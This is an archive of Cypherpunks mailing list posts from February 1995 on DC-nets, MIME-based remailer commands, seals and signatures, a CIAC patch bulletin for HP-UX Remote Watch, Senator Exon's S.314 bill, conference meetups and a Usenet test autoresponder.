The external inability to distinguish proper digital signatures from
forged ones has profound effect on the legal interpretations of the
physical signing device (hardware+software).  I wish only to point
this out and leave discussion to another thread.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 7 Feb 95 09:37:02 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: (dis)advantages of DC-Net vs remailers
Message-ID: <9502071736.AA00821@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  And when you try to figure how to deal with denial of service
>  attacks in a big DC net that tries to use bandwidth with tolerable
>  efficiency -- I don't know if anyone has figured out what would be
>  involved -- I certainly have not.

The bandwidth is the easy part.  Building clients that do a DC protocol with  
real-world reliability and resistance to denial of service is the hard part.   
And doing all this in a package that would be easy to get people to use is  
probably the hardest part.

The only way I know of to deal with denial of service is for everyone to  
reveal their flips and kick the attackers out of the net.  However, if  
someone is legitimately transmitting that round they loose their  
untraceability.  So pretty much the only way to do it is ensure that only one  
participant has permission to transmit and that the participant with  
permission gets to decide if everyone shows their hands.

A way to do this would be to have a separate reservation phase of the  
protocol.  In the reservation phase all of the participants 'bid' on a token.  
 Whoever gets the token has permission to transmit during that round.  If  
collisions have been occurring, the participant holding the token can demand  
that everyone reveal their flips.  I think there is a paper describing a  
protocol for this, but I don't have access to a library with crypto material.

The protocol for distributing the token would be somewhere between an  
All-Or-Nothing-Disclosure-Of-Secrets and a poker card dealing protocol.  Only  
one person should be able to get the token and nobody should know who got it.  
 To make it more complicated, for people to be able to transmit in a timely  
fashion, you should be able to specifically request the token when you want  
it (so you would have a 1/n chance of getting it with n being the total  
number of participants wanting to transmit that round), and not have any  
chance of getting it when you don't want to transmit.  In addition the  
generation of the token(s) should be secure so that none of the participants  
have to trust anyone that only one participant can get a valid transmit  
token.

I can think of a way to do this with a mental poker protocol.  The only  
problem is there is always a 1/n chance of getting the transmit token (where  
n is the total number of participants), whether you want it or not.  I  
believe it also requires some trust in the 'dealer'...  Anyway, the deck  
would consist of 1 transmit token and n-1 blank tokens.  Immediately after  
the transmit phase the participant holding the token can optionally demand  
that everyone reveal their flips.  To do that the participant would reveal  
their valid transmit token.  At that point everyone else would reveal their  
blank transmit tokens (to make sure there are no duplicates).  If anyone  
refuses to reveal their blank token, they are removed from the net.  Once  
it's been determined that there is only one valid transmit token, everyone  
reveals their flips.

In theory all of this stuff would work, but implementing it is a different  
story.  For a DC net to be practical, it would have to run completely without  
human intervention.  Maybe a client could be placed in your .login or shell  
rc file and would run in the background whenever you were logged in.  It  
could keep running after you logged out if you had a message in your queue to  
be sent out.  Clients must be smart enough to synchronize rounds and remove  
participants who aren't responding fast within time-outs, etc...   
automatically attempt to 'lay a trap' when collisions have been occurring,  
figure out who is disrupting or not following protocol and remove them or  
alternately have the client drop out of the DC-Net when protocol hasn't been  
followed to satisfaction (duplicate tokens in one round, etc...), etc...

Quite a tall order, and for how much more untraceability than the current  
remailer system?  Even if it is implemented you still have to get people to  
use it.  The current remailer system can be used with no software  
whatsoever...

Still, it's an interesting prospect, as it offers real sender and receiver  
untraceability within the group of participants.  But is it worth it?


(apologies for the length...)
andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 7 Feb 95 08:49:48 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <199502071636.IAA15674@jobe.shell.portal.com>
Message-ID: <9502071649.AA08393@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I was actually contemplating going a bit further, and making the core
message not a "text/plain" but a Message/Rfc822, but without a "From",
or perhaps with a "From: somethingfictitious". I also wouldn't declare
the contents to be a multipart -- rather I'd have them be a security
multiparts container that in turn contained a multipart containing a
remail commands section and another security multipart...

Hal says:
> From: "Perry E. Metzger" <perry@imsi.com>
> > 
> >     I'd say that it would work far better if things were changed to MIME
> >     formats. You would send a message by recursively encapsulating your
> >     message to be remailed inside a MIME message. Simple and clean...
> 
> Here is an example of how such a mesage might look.  I created it using
> the safe-tcl scripting language.  Interestingly, safe-tcl can to a
> considerable extent be considered a tcl extension to let you work easily
> with mime messages.  It makes it easy to create and parse them.
> 
> The whole message could be encrypted and marked with the "Encrypted: PGP"
> header as we do now, or when the new PGP/MIME standard is finalized then
> that could be followed.
> 
> I made up two new content types for this, one to hold the composite
> multipart message, and one to hold the remailer commands themselves.
> Although these types are not implemented, I think it would be very easy
> to make a remailer that would use this structure, built out of safe-tcl.
> (The batching and latency would not be trivial, but the basic remailing
> would be easy.)
> 
> Hal
> 
> > To: hfinney@shell.portal.com
> > Subject: No subject
> > Mime-Version: 1.0
> > Content-Type: multipart/remail; boundary="----- =_792174086"
> > Content-ID: <1471.792173861.3@cryo>
> >  
> > ------- =_792174086
> > Content-Type: application/remail-commands
> > Content-ID: <1471.792173861.1@cryo>
> > 
> > Latency: 2 hours
> > Minimum-Batch-Size: 5 messages
> > Anon-Send-To: cypherpunks@toad.com
> > Subject: Example of remailed message
> >  
> > ------- =_792174086
> > Content-Type: text/plain
> > Content-ID: <1471.792173861.2@cryo>
> >  
> > This is a message which is being sent to the mailing list.
> > It is being remailed via a MIME-based structure where two new content types
> > are defined: multipart/remail and application/remail-commands.  The
> > multipart/remail type is supposed to be composed of two parts, the
> > application/remail-commands part which has remailer commands, and the
> > other part which is the "payload" to be remailed.
> >  
> > ------- =_792174086--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 12:27:56 PST
To: perry@imsi.com
Subject: Seals and Sealing Waxes
Message-ID: <ab5d0f8b040210047448@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Perry says:

>root says:
>> This is the same problem that arose with the original idea of seals once
>> the skills of metalworking became commen enough. By the 1500's it was
>> nearly impossible to keep a seal confidential more than a few weeks until
>> somebody got a impression and built a copy.
>
>Seals were duplicatable from the start. You just needed clay and a
>seal made with the oritinal if you wanted to forge them -- fairly
>common stuff. Signatures have been duplicatable from the start, too.

"All crypto is economics," and this is what made seals and sealing wax so
useful for so long. Saying "seals were duplicatable from the start" does
not mean this feat was easy, even if technically possible.

In fact, the fine details produced by a good seal are hard to exactly
emulate with a copy. Even on a two-dimensional surface. And with the advent
of three-dimensional surfaces, which sealing wax made possible, the fine
detail of a good seal was in fact very hard to forge.

Not impossible, but very costly with the technology of the day. Or even the
technology of _today_. After all, paper currency is largely based on seal
technology, with various embossing, printing, etc. methods used (on special
paper) that remain fairly hard to duplicate.

(Not impossible, and counterfeiting flourishes. It's all about economics,
and I'm only disputing the claims of easiness. As an added note,
transactions in the Far East are still often "sealed" with "chop marks,"
carved stamps that are uniquely associated with persons or groups.)

>Signatures and seals are NOT truly authenticating technologies. They
>are just a legal mechanism for an entity to demonstrate that it has
>read and agreed to the terms on a document. It was always assumed that
>someone might forge a signature, which is why if you had a document
>where you cared that people might disclaim their signature, you got
>people who could testify to the signature to witness the signing.

I think this understates the importance of signatures and seals in these
earlier times.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 7 Feb 95 09:58:40 PST
To: cypherpunks@toad.com
Subject: CIAC Bulletin F-10:  HP-UX Remote Watch
Message-ID: <199502071758.MAA14611@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   [Reformated for mailing by <jya@pipeline.com>.]


   Sender: ciac-bulletin@cheetah.llnl.gov
   Subject: CIAC Bulletin F-10: HP-UX Remote Watch


       _____________________________________________________
                   The U.S. Department of Energy
               Computer Incident Advisory Capability
                     ___  __ __    _     ___
                    /       |     /_\   /
                    \___  __|__  /   \  \___
       _____________________________________________________

                       INFORMATION BULLETIN

                        HP-UX Remote Watch


   February 6, 1995 1200 PST                     Number F-10
   _________________________________________________________

   PROBLEM:       Security vulnerabilities in HP-UX Remote
                  Watch can be used to increase access
                  privileges of users.

   PLATFORMS:     HP 9000 series 300/400s and 700/800s, for
                  HP-UX versions 8.x and 9.x

   DAMAGE:        User can increase their access privileges.

   SOLUTION:      Apply appropriate vendor patch as described
                  below.
   _________________________________________________________

   VULNERABILITY
   ASSESSMENT:    The security vulnerability in HP-UX Remote
                  Watch can be used to increase a user's
                  access privileges which may result in
                  system compromise.  CIAC urges affected
                  sites to install install the appropriate
                  secuirty patch as soon as possible.
   _________________________________________________________

        Critical Information about HP-UX Remote Watch

   CIAC has obtained information from Hewlett Packard
   regarding a new security vulnerability in Remote Watch
   contained in the WATCH-RUN fileset for releases of HP-UX. 
   Appendix I provides detailed patch information for the HP
   Remote Watch vulnerability.


   The document /pub/ciac/bulletin/f-fy95/hppatchs.txt has
   been updated to reflect this bulletin.  The hppatchs.txt
   document contains the entire list of all HP Bulletins and
   patches and is available on our FTP server ciac.llnl.gov.


   HP has an automatic server to allow patches and other
   security information to be retrieved over the Internet.  To
   utilize this server, send an e-mail message to
   support@support.mayfield.hp.com.  The subject line of the
   message is ignored and the body (text) of the message
   should contain the words


   send XXXX


   where XXXX is the identifier for the information you want
   retrieved.  For example, to retrieve the patch PHSS_4834,
   the message would be "send PHSS_4834".


   Other information that can be retrieved include the HP
   SupportLine mail service user's guide (send guide.txt), the
   readme file for a patch and the original HP bulletin (send
   doc HPSBUX9501-020).


   HP also has a World Wide Web server to browse and retrieve
   bulletins and patches.  To utilize this server, use a WWW
   client and connect to http://support.mayfield.hp.com.


   IMPORTANT NOTE: Hewlett Packard updates patches
   periodically.  These updates are not reflected in the text
   of each HP bulletin.  The overview presented here contains
   current information on the patches available at the time of
   the release of this CIAC bulletin.  If you request an
   updated patch, when you try to retrieve the patch you will
   receive a message stating that the patch is obsolete and
   the name of the patch which supersedes it.


   Hewlett Packard has made sum and MD5 checksums available
   for their patches and for their security bulletins.  See
   the detailed explanation for HPSBUX9408-016 in CIAC
   bulletin F-02 for information on how to access and utilize
   these checksums.

   _________________________________________________________

   CIAC wishes to thank Hewlett Packard for the information
   contained in this bulletin.
   _________________________________________________________

   CIAC is the computer security incident response team for
   the U.S. Department of Energy.  Services are available free
   of charge to DOE and DOE contractors.


   DOE and DOE contractor sites can contact CIAC at:

        Voice:   510-422-8193
        FAX:     510-423-8002
        STU-III: 510-423-2604
        E-mail:  ciac@llnl.gov


   Previous CIAC notices, anti-virus software, and other
   information are available on the Internet via anonymous FTP
   from ciac.llnl.gov (IP address 128.115.19.53).


   CIAC has several self-subscribing mailing lists for
   electronic publications:

   1.   CIAC-BULLETIN for Advisories, highest priority - time
        critical information, and Bulletins, important
        computer security information;

   2.   CIAC-NOTES for Notes, a collection of computer
        security articles;

   3.   SPI-ANNOUNCE for official news about Security Profile
        Inspector (SPI) software updates, new features,
        distribution and availability;

   4.   SPI-NOTES, for discussion of problems and solutions
        regarding the use of SPI products.


   Our mailing lists are managed by a public domain software
   package called ListProcessor, which ignores E-mail header
   subject lines. To subscribe (add yourself) to one of our
   mailing lists, send requests of the following form:


   subscribe list-name LastName, FirstName PhoneNumber


   as the E-mail message body, substituting CIAC-BULLETIN,
   CIAC-NOTES, SPI-ANNOUNCE or SPI-NOTES for "list-name" and
   valid information for "LastName" "FirstName" and
   "PhoneNumber."  Send to: ciac-listproc@llnl.gov not to:
   ciac@llnl.gov


   e.g.,

   subscribe ciac-notes O'Hara, Scarlett 404-555-1212 x36

   subscribe ciac-bulletin O'Hara, Scarlett 404-555-1212 x36


   You will receive an acknowledgment containing address and
   initial PIN, and information on how to change either of
   them, cancel your subscription, or get help.
   _________________________________________________________

   PLEASE NOTE: Many users outside of the DOE and ESnet
   computing communities receive CIAC bulletins. If you are
   not part of these communities, please contact your agency's
   response team to report incidents. Your agency's team will
   coordinate with CIAC. The Forum of Incident Response and
   Security Teams (FIRST) is a world-wide organization. A list
   of FIRST member organizations and their constituencies can
   be obtained by sending E-mail to first-request@first.org
   with an empty subject line and a message body containing
   the line: send first-contacts.


   This document was prepared as an account of work sponsored
   by an agency of the United States Government. Neither the
   United States Government nor the University of California
   nor any of their employees, makes any warranty, expressed
   or implied, or assumes any legal liability or
   responsibility for the accuracy, completeness, or
   usefulness of any information, product, or process
   disclosed, or represents that its use would not infringe
   privately owned rights. Reference herein to any specific
   commercial products, process, or service by trade name,
   trademark manufacturer, or otherwise, does not necessarily
   constitute or imply its endorsement, recommendation, or
   favoring by the United States Government or the University
   of California. The views and opinions of authors expressed
   herein do not necessarily state or reflect those of the
   United States Government nor the University of California,
   and shall not be used for advertising or product
   endorsement purposes.

   _________________________________________________________

        Appendix I:  Details of HP-UX Remote Watch Bulletin


   HPSBUX9510-020: HP-UX Remote Watch dated January 31, 1995


   This vulnerability can allow users to increase their access
   privileges which may result in system compromise.  All HP
   300/400 and 700/800 series machines running HP-UX 8.x or
   9.x which have Remote Watch installed are affected.


   The patch to install depends on which operating system
   version and machine series you are currently using.  Use
   the following table to determine which patch to retrieve
   and install:


   Operating System      Series    Apply patch

   HP-UX 8.x             800       PHSS_5185
   HP-UX 9.x             800       PHSS_5136
   HP-UX 8.x             700       PHSS_5180
   HP-UX 9.x             700       PHSS_5107
   HP-UX 8.x             300/400   PHSS_5168
   HP-UX 9.x             300/400   PHSS_5120


   Obtain necessary patches, and install per the installation
   instructions included with the patches.


   After the patch is installed, be sure to examine
   /tmp/update.log for any relevant WARNINGs or ERRORs.  This
   can be done by typing "tail -60 /tmp/update.log | more",
   then paging through the screens via the space bar, looking
   for WARNING or ERROR messages.


   [END]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Tue, 7 Feb 95 10:14:44 PST
To: cypherpunks@toad.com
Subject: testing the waters re: new crypto FTP site
Message-ID: <v01510101ab5d68bca64c@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'm considering setting up a new FTP site dedicated to cryptography
and security software, code, and information, with particular emphasis
on personal microcomputer (even more particular emphasis on macintosh :)
) security.

I'm sending this message to test the waters regarding how useful such
a new site would be. I considered setting up a new PGP keyserver
earlier, but the consensus of net.opinion when I asked about it seemed
to be that there were plenty of keyservers that worked fine already, so
I abandoned the idea. :-) Does anyone have an opinion they could send me
regarding whether such a new site would be useful / would not be too
useful? I'm looking to do something that would actually be useful to the
net.community.

For example, I'd like to scavenge the various crypto archives as well
as public archives for programs to password-protect hard drives, encrypt
files and volumes, monitor AppleShare access, do stegnanography, and so
on. Of course, there are the old standbys as well: PGP, cryptanalysis,
dictionaries, password crackers, interesting documentation and clippings
from EMAIL and net.posts from people who know their stuff, and so on.

The crypto stuff, folks would have to send me email establishing legal
eligibility, whereupon I'd create for them a non-anonymous account. The
non-crypto stuff would be in directories accessible to anonymous FTP
login.

This sounds like a lot of fun and I'd enjoy running it. However, if,
like my keyserver idea, I wouldn't be doing anything really new or
useful, it might just be a way for me to spend lots of time not getting
much useful stuff done. :-)

In particular, mail saying "Yeah, that sounds cool, I'd use it" would
mean potential users. No mail to this effect would mean folk already
have sufficient FTP resources. Any opinions appreciated.

Tom
tjb@acpub.duke.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLze6FluwJA7oL8O9AQGtGAQAxAXt1Fhw5IykRe7W4Ls09NvKePwL5l4t
43uwnEunDNUNWYpdPqVOAErb1RG4217RC2bXRkzwPiorPzxNP8X1IYdS81fQ1NZo
288OO3IJC0xvT3+YxglKerAfkHY5sfrihGKOysT/BZfxNSY6LM/8N38T2hyRyw/4
ZGE0o2KP4TQ=
=XY/5
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 13:28:59 PST
To: ktk@anemone.corp.sgi.com (Katy Kislitzin)
Subject: CFP, Cypherpunks, and Crypto
In-Reply-To: <199502071830.KAA29964@anemone.corp.sgi.com>
Message-ID: <199502072127.NAA28248@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Katy Kislitzin wrote:

> > From: Adam Shostack <adam@bwh.harvard.edu>
>  > Is the march meeting scheduled yet?  I'm trying to plan to be out for
>  > both CFP & the cypherpunks meeting, but have paid no attention to when
>  > they're held, since I live on the wrong coast to attend most of them.
...
>  We have the usual 2nd Saturday (March 12) meeting planned, but I
>  *definitely* think cpunks should do something around the cfp
>  conference.  last year we did an informal in-the-hotel-halls meeting,
>  but since this cfp is in the bay area....  I propose keeping the
> regular March and April mtgs, and adding a cpunks dinner &&|| BOF at
> cfp.  other ideas?

The Computers, Freedom, and Privacy Conference is to be held 29-31
March 1995, at the Marriott in Burlingame, CA (SF Airport). Details
have been distributed recently to most of the usual places.

I'll be on Michael Froomkin's "Crypto" panel on Friday, 31 March.
Along with Stewart Baker (ex-NSA, famous for "Clipper opponents just
getting revenge for missing Woodstock"), Steve Walker (TIS), Phil
Karn, a Microsoft guy, and maybe others. Details should be available.

So I'm all for a Cypherpunks BOF ("birds of a feather," in case this
term is new to you....basically, a special interest group gathering)
or dinner. Maybe more than one?

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Tue, 7 Feb 95 05:32:28 PST
To: cypherpunks@toad.com
Subject: RE: Re: lwall
Message-ID: <9502071330.AA03045@pero>
MIME-Version: 1.0
Content-Type: text/plain


Someone at Berkeley's been a reet tit,
haven't they..

--
Richard

> ------------------------------- your post follows ----------------------------
> Path: netnet2.netnet.net!news.sprintlink.net!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
> Subject: lwall
> Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
> NNTP-Posting-Host: ack.berkeley.edu
> Organization: cypherpunks
> Lines: 2
> From: cypherpunks@toad.com
> Distribution: world
> Newsgroups: alt.test
> Date: 6 Feb 1995 19:34:19 GMT
> 
> test
> test
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 7 Feb 95 10:41:14 PST
To: jya@pipeline.com (John Young)
Subject: Re: CIAC Bulletin F-10:  HP-UX Remote Watch
In-Reply-To: <199502071758.MAA14611@pipe3.pipeline.com>
Message-ID: <199502071840.NAA05395@freud.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Since CERT & CIAC have public lists for this stuff, and since everyone
who wants to get these advisories already does, please post at most a
pointer to the things.

Adam



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 7 Feb 95 11:13:35 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Corporate Fascism, Rand, Greens, Oh My!
Message-ID: <199502071907.AA08674@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:

>Make no mistake about it, strong crypto, what I call crypto anarchy,
>will have as great an effect on corporate sizes, structures, and
>behaviors as it will have on governments. Maybe more of an effect.

For those of you who want a solid discussion of just *how* computer
technology (let alone crypto) downsizes companies see the Economist article
"The Incredible Shrinking Company" thoughtfully HTMLized by yours truely:

http://www.ios.com/~lroth/clips/bussiz.html

DCF

- --
If it's on your hard drive (and of interest to others) it should be on the
WEB.  Post something on your WEB page every day.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzeNoYVO4r4sgSPhAQH8bQP/TuNsPuq3oz1aeXpGqXSomwou10ThucmE
MeEahsf6lg2RwSBiHzuykhprNHuYHpgnFjePxFRC2Wxl6rB0l5ySto/B9KOTXm47
LvAhwmpD1xmyomOkNqttlBLSopuXb1o4FewS/m7awV9N1+KK5IqLcYdJZxeaOK9H
i5u/Zw8oONE=
=XARh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Date: Tue, 7 Feb 95 14:44:29 PST
To: cypherpunks@toad.com
Subject: ssl-talk@netscape.com
Message-ID: <9502071444.ZM25840@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


There is now a new mailing list, called "ssl-talk@netscape.com" for people
wishing to discuss SSL and its implementations.

It uses the "smartlist" stuff, so send your (un)subscription request in the
message subject line.


-- 
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog@wookie.net (slowdog)
Date: 7 Feb 1995 14:58:36 GMT
Subject: URGENT - What S.314 Would Do
Message-ID: <3h81qs$ee0@dockmaster.phantom.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Article crossposted from comp.org.cpsr.talk,comp.org.cpsr.talk,misc.legal.comp ]
[ Author was slowdog (slowdog@wookie.net) ]
[ Posted on 7 Feb 1995 14:56:15 GMT ]

The following is what Senator Exon's bill (S.314) would do to the 
Communicatons Act of 1934. The text in [brackets] is what is being 
deleted or changed. What exists as plain text outside those brackets is 
how the new law will look.

Read carefully. There are indeed implications for Internet service 
providers in terms of their responsibility under the law for the content 
of their systems and services.


-------------------------------------------------------------------

   47 USC Sec. 223
   
   TITLE 47
   CHAPTER 5
   SUBCHAPTER II
   
   
   Sec. 223. [Obscene or harassing telephone calls in the District of
   Columbia or in interstate or foreign communications] Obscene or
   harassing utilization of telecommunications devices and facilities
   in the District of Columbia or in interstate or foreign
   communications
   
   
   (a) Prohibited acts generally
   
   Whoever -
   
   (1) in the District of Columbia or in interstate or foreign
   communication by means of [telephone] telecommunications
   device -
   
   (A) [makes any comment, request, suggestion or proposal] 
   makes, transmits, or otherwise makes available any comment,
   request, suggestions, proposal, image, or other communication]
   which is obscene, lewd, lascivious, filthy, or indecent;

   (B) [makes a telephone call, whether or not conversation
   ensues, without disclosing his identity and with intent to
   annoy, abuse, threaten, or harass any person at the called
   number] makes a telephone call or utilizes a telecommunications
   device, whether or not conversation or communications ensues,
   without disclosing his identity with intent to annoy, abuse,
   threaten, or harass any person at the called number or who
   receives the communication;
   
   (C) makes or causes the telephone of another repeatedly or   
   continuously to ring, with intent to harass any person at the
   called number; or
   
   (D) [makes repeated telephone calls, during which conversation
   ensues, solely to harass any person at the called number; or]
   makes repeated telephone calls or repeatedly initiates
   communication with a telecommunications device, during which
   comversation or communication ensues, solely to harass any
   person at the called number of who receives the communication;
   or
   
   (2) knowingly permits any [telephone] telecommunications facility
   under his control to be used for any purpose prohibited by this
   section, shall be fined not more than [$50,000] $100,000 or
   imprisoned not more than [six months] 2 years, or both.
   
   (b) Prohibited acts for commercial purposes; defense to prosecution
   
   (1) Whoever knowingly -
   
   (A) within the United States, by means of [telephone], 
   telecommunications device makes (directly or by recording device)
   any obscene communication for commercial purposes to any person, 
   regardless of whether the maker of such communication [placed the
   call] placed the call or initiated the conversation; or
   
   (B) permits any [telephone] telecommunications facility under such 
   person's control to be used for an activity prohibited by
   subparagraph (A), shall be fined in accordance with title 18 or 
   imprisoned not more than two years, or both.
   
   (2) Whoever knowingly -
   
   (A) within the United States, [by means of telephone, makes]
   by means of telecommunications device, makes, knowingly
   transmits, or knowingly makes available (directly or by recording 
   device) any indecent communication for commercial purposes which is 
   available to any person under 18 years of age or to any other person 
   without that person's consent, regardless of whether the maker of
   such communication [placed the call] placed the call or
   initiated the communication; or
   
   (B) permits any [telephone] telecommunications facility under such 
   person's control to be used for an activity prohibited by subparagraph 
   (A), shall be fined not more than [$50,000] $100,000 or imprisoned not 
   more than [six months] 2 years, or both.
   
   (3) It is a defense to prosecution under paragraph (2) of this
   subsection that the defendant restrict access to the prohibited
   communication to persons 18 years of age or older in accordance
   with subsection (c) of this section and with such procedures as the
   Commission may prescribe by regulation.
   
   (4) In addition to the penalties under paragraph (1), whoever,
   within the United States, intentionally violates paragraph (1) or
   
   (2) shall be subject to a fine of not more than [$50,000]
   $100,000 for each violation. For purposes of this paragraph, each
   day of violation shall constitute a separate violation.
   
   (5)(A) In addition to the penalties under paragraphs (1), (2),
   and (5), whoever, within the United States, violates paragraph (1)
   or (2) shall be subject to a civil fine of not more than [$50,000]
   $100,000 for each violation. For purposes of this paragraph, each
   day of violation shall constitute a separate violation.
   
   (B) A fine under this paragraph may be assessed either -
   
   (i) by a court, pursuant to civil action by the Commission or
   any attorney employed by the Commission who is designated by the
   Commission for such purposes, or
   
   (ii) by the Commission after appropriate administrative
   proceedings.
   
   (6) The Attorney General may bring a suit in the appropriate
   district court of the United States to enjoin any act or practice
   which violates paragraph (1) or (2). An injunction may be granted
   in accordance with the Federal Rules of Civil Procedure.
   
   (c) Restriction on access to subscribers by common carriers;
   judicial remedies respecting restrictions
   
   (1) A common carrier within the District of Columbia or within
   any State, or in interstate or foreign commerce, shall not, to the
   extent technically feasible, provide access to a communication
   specified in subsection (b) of this section from the [telephone]
   telecommunications device of any subscriber who has not previously 
   requested in writing the carrier to provide access to such 
   communication if the carrier collects from subscribers an identifiable 
   charge for such communication that the carrier remits, in whole or in 
   part, to the provider of such communication.
   
   (2) Except as provided in paragraph (3), no cause of action may
   be brought in any court or administrative agency against any common
   carrier, or any of its affiliates, including their officers,
   directors, employees, agents, or authorized representatives on
   account of -
   
   (A) any action which the carrier demonstrates was taken in good
   faith to restrict access pursuant to paragraph (1) of this
   subsection; or
   
   (B) any access permitted -
   
   (i) in good faith reliance upon the lack of any
   representation by a provider of communications that
   communications provided by that provider are communications
   specified in subsection (b) of this section, or
   
   (ii) because a specific representation by the provider did
   not allow the carrier, acting in good faith, a sufficient
   period to restrict access to restrict access to communications
   described in subsection (b) of this section.
   
   (3) Notwithstanding paragraph (2) of this subsection, a provider
   of communications services to which subscribers are denied access
   pursuant to paragraph (1) of this subsection may bring an action
   for a declaratory judgment or similar action in a court. Any such
   action shall be limited to the question of whether the
   communications which the provider seeks to provide fall within the
   category of communications to which the carrier will provide access
   only to subscribers who have previously requested such access.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xpat Autoresponder <autoreply@xpat.postech.ac.kr>
Date: Mon, 6 Feb 95 22:24:32 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <199502070619.PAA12524@xpat.postech.ac.kr>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PANIC!  REMAIN CALM!  READ *ALL* OF THIS MESSAGE BEFORE GETTING UPSET!

Your Usenet test article was received here at the news gateway machine for
the Pohang University of Science and Technology in Pohang, South Korea.
The Xpat newsadmins can be reached via e-mail at usenet@xpat.postech.ac.kr.
Any reply to this message will be dropped into the bit bucket, and never be
seen by a human.  Please note that we do not offer news access to sites
outside of our organization.

If you're a newsadmin and you'd like to run your own autoresponder, this one
is available from ftp://ftp.cccd.edu/pub/usenet/innautorespond.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

There are typically 5 possible reasons why you were sent this e-mail message:

1) You intentionally posted a Usenet news article to a *.test newsgroup.  
These newsgroups exist so you can verify that your articles are being 
propagated correctly.  When your article arrives here, we send you this message
as confirmation.  We will only send you ONE e-mail reply for each of your test
articles that we see.

2) You unintentionally posted a Usenet news article to a *.test newsgroup.  
This is a bit of net.childishness caused by a Followup-To: header directing all
replies into a *.test newsgroup.  This is done by somebody upset with the
content of a discussion thread who wants to "punish" anybody who replies to his
message.  Your reply will be sent to *.test instead of the original newsgroup,
and you will start receiving autoresponder messages similar to this one that
you didn't ask for.  To avoid this in the future, look for a Followup-To:
header and make sure it's appropriate before replying to any articles.

3) You were a victim of a Reply-To: header directing your e-mail into a *.test
newsgroup via a mail->news gateway.  Similar to 2) above.

4) Somebody has forged a posting in your name to one of the *.test newsgroups.
To avoid this in the future, use better net.etiquette and you will make fewer
net.enemies.  If you want to try and identify the forger, use the following
procedure.  Make a legitimate posting to the same *.test newsgroup that the
forger used.  We will send you an e-mail reply.  Compare the Path: header from
this legitimate reply with the Path: header from the forgery.  The front
part of the two headers will be the same or topologically similar path to
your site.  Where the forged header becomes substantially different can
provide clues to where the forger lives.  Note that if you receive multiple
newsfeeds you may need to repeat this process several times so you can discover
all legitimate paths between our site and yours.  Once you think you've
identified the forger's site, try sending POLITE e-mail to the newsadmin/
sysadmin/postmaster explaining the situation.

5) You issued a cancel control message to a *.test newsgroup.  Some users
dislike autoresponses for cancel messages, but the newsadmins here think it
can be a valuable diagnostic tool for verifying cancel propagation.  If you
don't like it, use the "delete" key in your mail client!

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

